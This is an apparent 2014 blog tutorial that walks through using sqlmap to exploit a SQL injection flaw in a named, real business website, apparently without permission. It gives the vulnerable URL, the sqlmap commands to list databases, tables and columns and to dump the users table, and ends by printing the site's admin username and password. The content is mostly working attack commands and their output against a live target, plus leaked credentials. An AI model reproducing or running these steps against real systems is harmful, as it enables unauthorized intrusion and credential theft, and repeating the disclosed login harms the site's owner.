Thursday 20 February 2014

SQL injection with SQLMAP Tool

SQLMAP-->

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.


first search the vulnerability into the target website.

target-->www.tsbuttons.com.bd 

now find the sql injection vulnerability into target website
ohh I found it....
vulnerability-->tsbuttons.com.bd/jean_tack_buttons.php?ptid=20'


this is the error on website
---------------------------------------------
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---------------------------------------------

now start the Game ( hack the target site )

1.open the sqlmap

root@kali:~# sqlmap --help





2.find out the database name of the target website

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 --dbs



output is
----------------------------------------
available databases [2]:
[*] information_schema
[*] tsbutton_db
---------------------------------------


3.access the tables of database

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db --tables



output is
--------------------------------------------------------------------------------------------------------
[23:29:38] [INFO] fetching tables for database: 'tsbutton_db'
Database: tsbutton_db
[4 tables]
+------------------------+
| news                 |         
| product            |
| product_type   |
| users               |
+------------------------+
---------------------------------------------------------------------------------------------------------

4.now it time to access the columns of tables which are we fetch from databse

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users --columns




output is
--------------------------------------------------------
Database: tsbutton_db
Table: users
[5 columns]
+--------------------+----------------------+
| Column        | Type               |
+-------------------+-----------------------+
| name           | varchar(25)    |
| Password   | varchar(255)  |
| type             | int(4)               |
| userid         | int(25)             |
| username | varchar(25)     |
+------------------+-----------------------+
-------------------------------------------------------


5.access the user name


root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C username --dump



yehh
we get the user name of the target website
username-->admin


6.Lets access the password

root@kali:~# sqlmap -u http://tsbuttons.com.bd/jean_tack_buttons.php?ptid=20 -D tsbutton_db -T users -C password --dump




 finally Game is over

--------------------------------------------------------------
username-->admin
password-->water
-------------------------------------------------------------